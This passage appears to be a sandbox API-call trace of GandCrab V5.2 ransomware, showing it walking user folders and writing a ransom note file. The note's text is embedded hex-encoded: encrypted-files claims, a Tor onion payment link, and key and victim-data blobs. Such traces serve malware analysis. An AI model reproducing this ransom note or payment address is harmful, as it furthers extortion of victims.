lstrcmpW (lpString1="Mozilla", lpString2="..") returned 1 [0079.874] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\", lpString2="Mozilla" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla" [0079.874] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\" [0079.874] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x25d0000 [0079.874] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0079.874] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0079.874] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0079.875] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0079.875] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0079.875] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0079.875] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0079.875] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0079.875] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.875] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0079.875] wsprintfW (in: param_1=0x25d0200, param_2="%s\\%s-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\\\TITWMVJL-DECRYPT.txt") returned 67 [0079.875] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\\\TITWMVJL-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\titwmvjl-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2b4 [0079.876] lstrlenW (lpString="\xfeff\x2d\x2d\x2d\x3d\x20\x20\x20\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x56\x35\x2e\x32\x20\x20\x20\x20\x3d\x2d\x2d\x2d\x20\x0d\x0a\x0d\x0a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x55\x4e\x44\x45\x52\x20\x4e\x4f\x20\x43\x49\x52\x43\x55\x4d\x53\x54\x41\x4e\x43\x45\x53\x20\x44\x4f\x20\x4e\x4f\x54\x20\x44\x45\x4c\x45\x54\x45\x20\x54\x48\x49\x53\x20\x46\x49\x4c\x45\x2c\x20\x55\x4e\x54\x49\x4c\x20\x41\x4c\x4c\x20\x59\x4f\x55\x52\x20\x44\x41\x54\x41\x20\x49\x53\x20\x52\x45\x43\x4f\x56\x45\x52\x45\x44\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x09\x2a\x2a\x2a\x2a\x2a\x46\x41\x49\x4c\x49\x4e\x47\x20\x54\x4f\x20\x44\x4f\x20\x53\x4f\x2c\x20\x57\x49\x4c\x4c\x20\x52\x45\x53\x55\x4c\x54\x20\x49\x4e\x20\x59\x4f\x55\x52\x20\x53\x59\x53\x54\x45\x4d\x20\x43\x4f\x52\x52\x55\x50\x54\x49\x4f\x4e\x2c\x20\x49\x46\x20\x54\x48\x45\x52\x45\x20\x41\x52\x45\x20\x44\x45\x43\x52\x59\x50\x54\x49\x4f\x4e\x20\x45\x52\x52\x4f\x52\x53\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x41\x74\x74\x65\x6e\x74\x69\x6f\x6e\x21\x20\x0d\x0a\x0d\x0a\x41\x6c\x6c\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2c\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x73\x2c\x20\x70\x68\x6f\x74\x6f\x73\x2c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x73\x20\x61\x6e\x64\x20\x6f\x74\x68\x65\x72\x20\x69\x6d\x70\x6f\x72\x74\x61\x6e\x74\x20\x66\x69\x6c\x65\x73\x20\x61\x72\x65\x20\x65\x6e\x63\x72\x79\x70\x74\x65\x64\x20\x61\x6e\x64\x20\x68\x61\x76\x65\x20\x74\x68\x65\x20\x65\x78\x74\x65\x6e\x73\x69\x6f\x6e\x3a\x20\x2e\x54\x49\x54\x57\x4d\x56\x4a\x4c\x20\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x6f\x6e\x6c\x79\x20\x6d\x65\x74\x68\x6f\x64\x20\x6f\x66\x20\x72\x65\x63\x6f\x76\x65\x72\x69\x6e\x67\x20\x66\x69\x6c\x65\x73\x20\x69\x73\x20\x74\x6f\x20\x70\x75\x72\x63\x68\x61\x73\x65\x20\x61\x6e\x20\x75\x6e\x69\x71\x75\x65\x20\x70\x72\x69\x76\x61\x74\x65\x20\x6b\x65\x79\x2e\x20\x4f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x67\x69\x76\x65\x20\x79\x6f\x75\x20\x74\x68\x69\x73\x20\x6b\x65\x79\x20\x61\x6e\x64\x20\x6f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x72\x65\x63\x6f\x76\x65\x72\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2e\x0d\x0a\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x73\x65\x72\x76\x65\x72\x20\x77\x69\x74\x68\x20\x79\x6f\x75\x72\x20\x6b\x65\x79\x20\x69\x73\x20\x69\x6e\x20\x61\x20\x63\x6c\x6f\x73\x65\x64\x20\x6e\x65\x74\x77\x6f\x72\x6b\x20\x54\x4f\x52\x2e\x20\x59\x6f\x75\x20\x63\x61\x6e\x20\x67\x65\x74\x20\x74\x68\x65\x72\x65\x20\x62\x79\x20\x74\x68\x65\x20\x66\x6f\x6c\x6c\x6f\x77\x69\x6e\x67\x20\x77\x61\x79\x73\x3a\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x7c\x20\x30\x2e\x20\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x2d\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x74\x6f\x72\x70\x72\x6f\x6a\x65\x63\x74\x2e\x6f\x72\x67\x2f\x20\x0d\x0a\x0d\x0a\x7c\x20\x31\x2e\x20\x49\x6e\x73\x74\x61\x6c\x6c\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x32\x2e\x20\x4f\x70\x65\x6e\x20\x54\x6f\x72\x20\x42\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x33\x2e\x20\x4f\x70\x65\x6e\x20\x6c\x69\x6e\x6b\x20\x69\x6e\x20\x54\x4f\x52\x20\x62\x72\x6f\x77\x73\x65\x72\x3a\x20\x20\x20\x68\x74\x74\x70\x3a\x2f\x2f\x67\x61\x6e\x64\x63\x72\x61\x62\x6d\x66\x65\x36\x6d\x6e\x65\x66\x2e\x6f\x6e\x69\x6f\x6e\x2f\x39\x39\x38\x61\x32\x66\x34\x35\x64\x32\x63\x61\x34\x64\x65\x66\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x7c\x20\x34\x2e\x20\x46\x6f\x6c\x6c\x6f\x77\x20\x74\x68\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x74\x68\x69\x73\x20\x70\x61\x67\x65\x20\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x4f\x6e\x20\x6f\x75\x72\x20\x70\x61\x67\x65\x20\x79\x6f\x75\x20\x77\x69\x6c\x6c\x20\x73\x65\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x70\x61\x79\x6d\x65\x6e\x74\x20\x61\x6e\x64\x20\x67\x65\x74\x20\x74\x68\x65\x20\x6f\x70\x70\x6f\x72\x74\x75\x6e\x69\x74\x79\x20\x74\x6f\x20\x64\x65\x63\x72\x79\x70\x74\x20\x31\x20\x66\x69\x6c\x65\x20\x66\x6f\x72\x20\x66\x72\x65\x65\x2e\x20\x0d\x0a\x0d\x0a\x0d\x0a\x41\x54\x54\x45\x4e\x54\x49\x4f\x4e\x21\x0d\x0a\x0d\x0a\x49\x4e\x20\x4f\x52\x44\x45\x52\x20\x54\x4f\x20\x50\x52\x45\x56\x45\x4e\x54\x20\x44\x41\x54\x41\x20\x44\x41\x4d\x41\x47\x45\x3a\x0d\x0a\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x4d\x4f\x44\x49\x46\x59\x20\x45\x4e\x43\x52\x59\x50\x54\x45\x44\x20\x46\x49\x4c\x45\x53\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x43\x48\x41\x4e\x47\x45\x20\x44\x41\x54\x41\x20\x42\x45\x4c\x4f\x57\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x6c\x41\x51\x41\x41\x42\x42\x6a\x58\x74\x68\x4a\x35\x51\x30\x77\x50\x44\x4f\x69\x52\x2f\x55\x55\x71\x42\x6a\x71\x4e\x47\x47\x52\x4d\x53\x45\x54\x66\x6e\x4b\x46\x4e\x2f\x77\x43\x30\x5a\x32\x79\x38\x75\x58\x4e\x4b\x2f\x63\x51\x52\x78\x51\x2b\x75\x78\x6a\x76\x48\x59\x6f\x52\x4e\x57\x4b\x4f\x77\x79\x70\x66\x53\x6e\x77\x69\x73\x61\x7a\x66\x6f\x32\x49\x75\x35\x76\x57\x57\x2b\x52\x43\x6b\x47\x47\x42\x31\x47\x6e\x65\x73\x51\x6b\x51\x77\x75\x54\x32\x41\x5a\x78\x56\x78\x35\x51\x59\x34\x69\x65\x2b\x6c\x65\x57\x2f\x4d\x5a\x41\x77\x47\x50\x70\x7a\x38\x2f\x37\x64\x5a\x77\x6f\x4c\x2b\x55\x71\x71\x4f\x77\x4d\x70\x54\x47\x33\x2b\x41\x6e\x76\x45\x51\x33\x4c\x4d\x6e\x49\x69\x51\x63\x70\x34\x48\x44\x66\x64\x33\x38\x4d\x50\x52\x43\x73\x52\x36\x67\x71\x63\x49\x48\x6f\x42\x70\x55\x4c\x77\x43\x33\x47\x6d\x37\x78\x7a\x74\x5a\x42\x69\x48\x47\x5a\x67\x5a\x56\x37\x4c\x6e\x61\x67\x51\x6b\x72\x4f\x41\x6c\x77\x54\x31\x36\x69\x70\x71\x4c\x31\x7a\x58\x54\x34\x6b\x4f\x79\x47\x45\x5a\x4c\x53\x6c\x71\x36\x48\x52\x57\x72\x52\x4a\x6b\x59\x53\x51\x35\x7a\x4c\x74\x50\x31\x54\x6b\x34\x68\x6d\x6d\x42\x51\x31\x66\x6f\x6a\x57\x46\x72\x63\x6f\x54\x34\x36\x78\x63\x76\x57\x2b\x33\x53\x33\x30\x6e\x56\x30\x46\x43\x51\x59\x64\x6a\x35\x68\x48\x66\x62\x50\x6c\x62\x4f\x52\x5a\x72\x69\x34\x6e\x2b\x65\x55\x43\x49\x6c\x46\x31\x74\x4b\x78\x62\x45\x69\x51\x74\x4a\x4e\x74\x66\x66\x74\x31\x76\x6b\x59\x31\x62\x6e\x78\x49\x64\x74\x45\x74\x57\x62\x49\x4e\x77\x6c\x75\x6e\x2f\x31\x39\x37\x67\x4f\x72\x72\x49\x58\x4a\x2b\x45\x70\x37\x61\x31\x73\x34\x68\x41\x54\x32\x6b\x45\x6b\x6d\x31\x48\x55\x4e\x39\x39\x46\x55\x4d\x7a\x2b\x49\x73\x51\x45\x4b\x35\x41\x44\x59\x6d\x35\x4a\x73\x42\x55\x61\x63\x59\x6c\x58\x52\x65\x77\x77\x78\x4e\x41\x55\x67\x6b\x77\x54\x51\x31\x69\x78\x57\x48\x63\x68\x36\x4c\x4e\x66\x6f\x46\x62\x78\x2f\x59\x30\x51\x67\x6c\x59\x47\x6c\x37\x36\x62\x4c\x67\x6c\x6a\x67\x6c\x50\x69\x61\x72\x2b\x46\x4d\x6d\x73\x4a\x6b\x48\x44\x78\x58\x46\x41\x64\x70\x56\x50\x4d\x4b\x54\x2b\x50\x70\x63\x6e\x32\x67\x31\x52\x65\x6f\x6d\x79\x5a\x73\x41\x77\x33\x30\x68\x4e\x4d\x79\x59\x43\x74\x79\x7a\x59\x56\x6d\x51\x7a\x4e\x56\x56\x77\x65\x76\x4d\x6b\x70\x71\x33\x44\x66\x76\x30\x76\x48\x65\x43\x6a\x58\x63\x30\x71\x67\x72\x38\x48\x53\x78\x6f\x57\x53\x6c\x56\x42\x7a\x55\x4c\x72\x47\x64\x77\x71\x7a\x61\x62\x59\x79\x6f\x72\x78\x32\x77\x62\x32\x6c\x50\x71\x6e\x43\x73\x4c\x2f\x59\x4f\x74\x63\x72\x69\x65\x50\x62\x77\x73\x57\x59\x46\x5a\x51\x47\x46\x63\x31\x4a\x6f\x71\x4a\x4a\x5a\x35\x4a\x74\x74\x4a\x35\x31\x45\x4c\x44\x52\x43\x4e\x4d\x44\x68\x74\x5a\x76\x42\x66\x61\x49\x7a\x65\x39\x54\x5a\x4c\x52\x61\x43\x42\x69\x30\x4d\x4a\x68\x54\x57\x30\x38\x74\x63\x66\x54\x6f\x62\x4a\x76\x4a\x30\x4d\x39\x34\x56\x62\x51\x44\x76\x2b\x4e\x51\x37\x6e\x6b\x78\x69\x35\x53\x33\x38\x67\x32\x46\x72\x4d\x38\x48\x75\x66\x71\x71\x49\x34\x5a\x67\x4c\x6f\x71\x43\x74\x45\x5a\x44\x67\x69\x62\x74\x42\x77\x51\x7a\x6d\x77\x30\x55\x2b\x64\x2f\x66\x69\x6d\x4d\x4e\x57\x66\x77\x4f\x55\x35\x65\x36\x77\x50\x4e\x6a\x50\x48\x5a\x6a\x73\x57\x38\x2f\x34\x48\x66\x30\x66\x67\x58\x41\x76\x42\x32\x2b\x67\x6b\x76\x52\x73\x75\x48\x53\x69\x75\x57\x53\x30\x5a\x78\x7a\x2f\x41\x42\x33\x4e\x69\x47\x4f\x64\x5a\x50\x64\x78\x72\x71\x4b\x71\x59\x49\x42\x4f\x6b\x4b\x35\x47\x48\x36\x6e\x39\x31\x51\x69\x74\x2f\x43\x66\x46\x66\x4e\x43\x68\x51\x59\x79\x73\x59\x48\x69\x45\x55\x31\x6d\x43\x4a\x2f\x46\x2f\x42\x6d\x65\x4a\x79\x37\x74\x41\x30\x55\x72\x62\x72\x6f\x4c\x53\x66\x45\x74\x7a\x53\x78\x63\x36\x4e\x73\x54\x48\x41\x65\x65\x6d\x48\x6e\x4e\x77\x38\x6d\x4c\x56\x41\x70\x52\x6e\x68\x50\x42\x36\x73\x36\x69\x5a\x66\x59\x6b\x62\x6f\x44\x4c\x45\x37\x64\x72\x56\x44\x6c\x52\x72\x66\x7a\x62\x6f\x63\x31\x56\x6e\x47\x76\x46\x66\x46\x42\x66\x2b\x5a\x37\x6b\x2b\x57\x55\x76\x6b\x6b\x68\x63\x41\x43\x5a\x69\x4b\x74\x6c\x50\x62\x70\x35\x34\x53\x2f\x73\x2b\x55\x73\x6d\x4e\x48\x6a\x55\x4e\x52\x36\x44\x78\x53\x49\x32\x31\x75\x61\x45\x50\x32\x4d\x30\x71\x75\x57\x53\x65\x46\x4a\x38\x77\x76\x61\x2b\x6e\x2f\x6c\x47\x35\x58\x75\x4c\x78\x4b\x4d\x59\x53\x44\x48\x4f\x61\x39\x79\x73\x34\x31\x48\x69\x51\x7a\x43\x33\x41\x33\x52\x67\x73\x2f\x78\x58\x4f\x74\x66\x4d\x31\x78\x6b\x56\x4d\x65\x6c\x5a\x78\x39\x64\x67\x6c\x6f\x66\x33\x34\x4a\x34\x47\x61\x6f\x45\x37\x53\x64\x34\x75\x41\x32\x6b\x79\x61\x4c\x76\x57\x62\x44\x43\x68\x55\x38\x5a\x46\x48\x48\x2b\x4c\x4f\x43\x66\x56\x41\x5a\x61\x48\x34\x55\x6e\x42\x65\x48\x63\x37\x68\x70\x36\x43\x53\x6a\x30\x4b\x77\x73\x31\x68\x30\x31\x46\x63\x58\x67\x74\x76\x6a\x43\x6e\x41\x70\x6a\x55\x37\x46\x72\x59\x53\x42\x43\x72\x77\x7a\x53\x73\x58\x4f\x55\x6b\x36\x41\x43\x34\x37\x41\x69\x56\x69\x48\x2f\x71\x45\x66\x42\x34\x44\x73\x66\x33\x72\x4e\x59\x38\x4a\x44\x62\x51\x54\x44\x72\x73\x57\x7a\x49\x39\x6f\x62\x71\x4e\x53\x4f\x46\x65\x2f\x4a\x4f\x73\x64\x4e\x4e\x56\x6c\x78\x39\x67\x51\x31\x79\x57\x59\x38\x4e\x65\x33\x51\x33\x76\x71\x62\x32\x61\x4e\x67\x6c\x67\x35\x2b\x6d\x6e\x66\x72\x4f\x50\x62\x51\x4a\x33\x66\x36\x53\x48\x79\x52\x53\x63\x68\x6f\x44\x72\x4a\x66\x7a\x38\x43\x69\x78\x75\x39\x53\x6b\x39\x38\x44\x59\x57\x66\x6a\x6e\x73\x70\x75\x35\x59\x64\x2f\x50\x78\x47\x44\x32\x55\x4f\x62\x6b\x30\x62\x68\x65\x4d\x78\x68\x52\x69\x73\x42\x63\x39\x42\x63\x7a\x53\x4f\x4c\x2b\x36\x74\x6c\x65\x62\x68\x42\x6d\x54\x68\x38\x4c\x46\x61\x56\x6f\x6d\x4b\x31\x53\x38\x75\x7a\x74\x73\x68\x52\x56\x63\x4f\x4a\x68\x70\x37\x6f\x2b\x48\x56\x35\x64\x51\x54\x35\x77\x41\x4c\x53\x79\x4c\x36\x67\x4e\x52\x47\x6e\x4f\x6a\x35\x34\x58\x51\x36\x75\x35\x36\x48\x2f\x70\x6a\x63\x2b\x54\x4b\x6c\x59\x30\x61\x57\x52\x76\x38\x76\x65\x63\x59\x44\x52\x44\x48\x4c\x55\x6e\x45\x48\x41\x42\x4c\x46\x71\x4a\x50\x36\x58\x79\x64\x31\x48\x53\x57\x32\x36\x4b\x65\x74\x6a\x56\x37\x4b\x6e\x42\x49\x68\x39\x46\x5a\x68\x67\x6b\x61\x64\x68\x71\x4f\x57\x75\x55\x67\x66\x6f\x53\x6f\x62\x72\x32\x61\x4d\x37\x59\x4f\x6a\x67\x5a\x52\x68\x44\x69\x6e\x59\x62\x31\x73\x54\x49\x49\x77\x62\x6d\x63\x64\x6f\x55\x45\x45\x62\x6a\x4c\x50\x7a\x33\x35\x2f\x70\x44\x62\x33\x72\x4b\x2f\x6a\x65\x53\x62\x43\x61\x70\x43\x68\x33\x7a\x43\x66\x66\x48\x72\x31\x68\x39\x58\x59\x57\x4c\x37\x6f\x67\x6c\x4b\x31\x49\x79\x39\x53\x6e\x50\x7a\x72\x4e\x74\x77\x35\x69\x6e\x6e\x35\x67\x46\x2f\x54\x62\x32\x32\x2f\x64\x78\x34\x2b\x32\x53\x61\x55\x48\x50\x78\x54\x79\x70\x4f\x79\x6b\x62\x66\x6a\x72\x57\x7a\x4e\x79\x4e\x34\x74\x38\x54\x70\x4a\x6d\x6a\x64\x76\x6d\x31\x41\x6c\x38\x53\x54\x53\x51\x73\x76\x76\x52\x55\x37\x45\x43\x61\x52\x37\x6e\x4c\x32\x41\x64\x42\x4e\x36\x4a\x32\x6d\x35\x6a\x6d\x64\x78\x54\x5a\x79\x64\x77\x4a\x50\x6e\x36\x31\x63\x70\x46\x39\x6b\x71\x44\x77\x2f\x74\x76\x4c\x4f\x4c\x4a\x43\x43\x7a\x56\x32\x5a\x44\x48\x33\x4f\x49\x6d\x56\x75\x69\x6e\x67\x31\x6c\x31\x65\x62\x63\x65\x42\x53\x45\x6a\x6f\x36\x52\x61\x36\x7a\x67\x75\x31\x4d\x6a\x32\x63\x58\x39\x57\x4d\x77\x31\x50\x78\x30\x53\x64\x32\x6c\x4d\x75\x77\x6d\x51\x6b\x34\x30\x36\x4f\x49\x64\x4c\x64\x55\x64\x34\x67\x6c\x71\x66\x30\x55\x48\x72\x38\x64\x66\x47\x4a\x79\x66\x62\x61\x4a\x45\x4c\x63\x74\x56\x36\x67\x36\x2b\x6e\x35\x66\x44\x71\x36\x56\x51\x41\x30\x72\x78\x78\x74\x79\x76\x6b\x43\x74\x68\x6d\x52\x4c\x73\x54\x67\x66\x4f\x6f\x58\x65\x34\x47\x37\x68\x39\x69\x4e\x75\x65\x73\x6f\x4d\x72\x30\x50\x6f\x61\x38\x6b\x4a\x5a\x54\x56\x68\x66\x33\x77\x54\x2f\x75\x75\x79\x64\x4d\x79\x55\x70\x63\x6c\x53\x49\x6a\x71\x2b\x66\x55\x49\x52\x72\x2b\x37\x6b\x2f\x57\x39\x4f\x39\x56\x73\x79\x32\x4e\x63\x78\x35\x70\x66\x2b\x53\x2b\x4d\x72\x4c\x31\x41\x6d\x35\x52\x51\x69\x33\x63\x36\x78\x46\x65\x54\x78\x33\x4d\x63\x5a\x52\x38\x30\x6e\x56\x69\x6e\x68\x75\x59\x6c\x69\x52\x51\x68\x4b\x4e\x6f\x4e\x57\x49\x32\x67\x48\x61\x47\x36\x6c\x52\x75\x7a\x2b\x51\x68\x47\x30\x52\x70\x4d\x59\x62\x7a\x42\x67\x4f\x6a\x35\x68\x69\x2f\x63\x63\x79\x55\x79\x68\x4d\x35\x66\x55\x49\x67\x63\x4a\x31\x39\x6c\x50\x64\x63\x6d\x76\x69\x78\x47\x6c\x6b\x35\x52\x38\x72\x6b\x32\x5a\x66\x78\x68\x4a\x78\x72\x46\x49\x75\x4c\x51\x54\x73\x52\x72\x61\x69\x77\x63\x44\x4d\x54\x41\x6d\x39\x63\x38\x6b\x64\x72\x2f\x59\x66\x34\x51\x6e\x2b\x62\x76\x37\x79\x4a\x5a\x34\x59\x58\x67\x42\x38\x45\x64\x6c\x31\x58\x64\x53\x6e\x4d\x72\x55\x50\x56\x35\x6f\x72\x63\x42\x78\x33\x32\x65\x73\x48\x6c\x31\x62\x46\x48\x6b\x65\x73\x39\x5a\x39\x66\x77\x6a\x46\x46\x78\x35\x42\x2f\x43\x72\x79\x6e\x36\x49\x30\x62\x54\x68\x36\x53\x78\x71\x78\x53\x4d\x4b\x66\x61\x77\x6c\x59\x6a\x57\x52\x79\x70\x35\x79\x58\x74\x4e\x69\x62\x62\x2b\x63\x7a\x78\x54\x77\x67\x30\x35\x57\x45\x56\x69\x44\x6a\x32\x5a\x4d\x35\x56\x46\x45\x35\x67\x39\x6a\x56\x78\x31\x7a\x4c\x67\x4c\x36\x72\x45\x6f\x78\x76\x62\x50\x33\x2f\x6f\x57\x73\x72\x33\x72\x72\x35\x38\x63\x71\x62\x45\x36\x49\x49\x48\x34\x6b\x33\x74\x74\x34\x75\x37\x69\x71\x7a\x66\x55\x6b\x4a\x6d\x48\x2b\x38\x31\x76\x5a\x62\x56\x7a\x59\x48\x63\x36\x48\x51\x4c\x2f\x56\x4c\x6d\x74\x2b\x59\x37\x68\x52\x6b\x36\x79\x6f\x72\x53\x6a\x31\x70\x6d\x69\x50\x46\x72\x58\x4c\x39\x39\x57\x72\x62\x6c\x41\x59\x36\x4e\x71\x79\x68\x32\x6d\x78\x2f\x6a\x4b\x44\x58\x4d\x5a\x7a\x64\x6c\x55\x51\x32\x4d\x35\x67\x6a\x56\x6c\x38\x36\x6c\x4e\x43\x6f\x33\x37\x4c\x44\x4c\x56\x48\x55\x4a\x64\x38\x73\x75\x41\x37\x78\x48\x61\x76\x47\x4b\x4d\x42\x7a\x7a\x78\x38\x35\x70\x2b\x4a\x2f\x55\x56\x39\x57\x50\x58\x6e\x72\x75\x45\x41\x3d\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d\x0d\x0a\x37\x66\x74\x44\x45\x67\x4c\x62\x2f\x5a\x53\x30\x6c\x63\x6d\x5a\x62\x48\x4d\x36\x31\x4b\x4c\x4a\x78\x51\x4f\x70\x44\x35\x34\x4b\x6b\x77\x36\x53\x62\x73\x73\x67\x66\x33\x59\x41\x57\x4f\x4d\x43\x79\x70\x2b\x4b\x59\x42\x78\x78\x47\x32\x44\x64\x39\x4d\x50\x4a\x45\x70\x44\x37\x41\x73\x6d\x56\x67\x4f\x43\x39\x52\x57\x66\x49\x52\x48\x51\x70\x51\x78\x47\x61\x31\x4c\x50\x47\x7a\x72\x45\x53\x47\x2b\x67\x67\x61\x72\x47\x58\x6f\x36\x62\x63\x47\x50\x4d\x70\x59\x30\x75\x48\x49\x6b\x6d\x67\x32\x38\x51\x55\x71\x68\x54\x73\x67\x6b\x67\x59\x58\x56\x70\x69\x44\x63\x46\x77\x69\x58\x48\x2f\x67\x6c\x4b\x56\x57\x6f\x56\x48\x4b\x43\x50\x5a\x4d\x70\x76\x37\x34\x43\x5a\x32\x4f\x38\x51\x33\x7a\x57\x61\x78\x30\x4b\x49\x52\x43\x2f\x6f\x76\x45\x74\x76\x42\x6d\x64\x6c\x53\x73\x70\x6d\x48\x4e\x76\x55\x46\x49\x4b\x6c\x30\x57\x59\x4e\x61\x41\x79\x77\x30\x53\x4b\x36\x62\x44\x4c\x6c\x46\x33\x79\x50\x71\x42\x35\x67\x6d\x61\x62\x46\x2b\x5a\x2f\x58\x4d\x47\x64\x33\x73\x67\x44\x37\x32\x35\x4a\x33\x2f\x55\x77\x42\x37\x77\x39\x78\x45\x57\x4c\x30\x79\x37\x34\x58\x71\x35\x33\x74\x48\x52\x6e\x4b\x53\x4d\x4a\x2b\x42\x6c\x31\x44\x7a\x65\x69\x71\x6f\x39\x46\x72\x64\x6e\x4d\x4b\x5a\x37\x31\x39\x47\x53\x56\x66\x4f\x2b\x54\x41\x69\x6d\x4c\x72\x37\x73\x34\x43\x75\x47\x41\x73\x70\x43\x61\x6a\x71\x52\x54\x77\x56\x66\x50\x66\x32\x30\x78\x42\x53\x55\x69\x44\x49\x74\x4c\x4f\x4a\x64\x4e\x41\x46\x42\x6e\x56\x71\x72\x4d\x5a\x6f\x52\x2b\x53\x33\x4e\x4c\x47\x59\x6d\x64\x61\x52\x33\x30\x66\x52\x50\x39\x33\x79\x71\x50\x4d\x77\x4c\x4f\x4c\x6a\x54\x36\x4f\x36\x72\x31\x78\x57\x34\x65\x5a\x78\x54\x7a\x50\x4a\x31\x66\x62\x44\x4c\x30\x39\x30\x30\x50\x66\x36\x53\x30\x61\x7a\x37\x4b\x41\x76\x6f\x54\x66\x46\x70\x35\x32\x47\x50\x44\x4b\x78\x35\x43\x68\x42\x75\x64\x72\x6f\x4d\x31\x6f\x4f\x36\x69\x71\x56\x7